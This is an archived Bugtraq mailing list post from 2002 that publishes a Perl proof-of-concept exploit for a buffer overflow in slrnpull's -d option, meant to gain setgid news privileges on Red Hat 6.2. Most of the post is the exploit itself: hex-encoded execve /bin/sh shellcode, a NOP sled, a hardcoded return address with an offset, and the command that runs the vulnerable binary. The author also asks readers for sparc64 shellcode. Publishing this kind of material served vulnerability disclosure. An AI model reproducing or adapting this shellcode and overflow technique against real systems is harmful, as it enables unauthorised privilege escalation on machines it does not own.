Bugtraq mailing list archives
slrnpull -d PoC
From: KF <dotslash () snosoft com>
Date: Wed, 24 Apr 2002 18:38:41 -0700
Heres an exploit for the slrnpull -d post ... http://online.securityfocus.com/archive/1/268963. Much thanks to zillion () snosoft com / safemode.org. Can anyone point me at some generic sparc64 linux execve shellcode?
-KF
#!/bin/sh echo DEFANGED.5 exit #!/usr/bin/perl # # Credits for the vulnerability: Alex Hernandez (its setgid news not root) # The exploit was written by: zillion () snosoft com / safemode.org # http://www.safemode.org # http://www.snosoft.com # # Gain setgid news on a Red Hat 6.2 Intel box $shellcode = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46". "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1". "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; $offset = "-500"; $esp = 0xbfffe2cc; for ($i = 0; $i < (2041 - (length($shellcode)) - 4); $i++) { $buffer .= "\x90"; } $buffer .= $shellcode; $buffer .= pack('l', ($esp + $offset)); print("The new return address: 0x", sprintf('%lx',($esp + $offset)), "\n"); exec("/usr/bin/slrnpull -d '$buffer'");
Current thread:
- slrnpull -d PoC KF (Apr 25)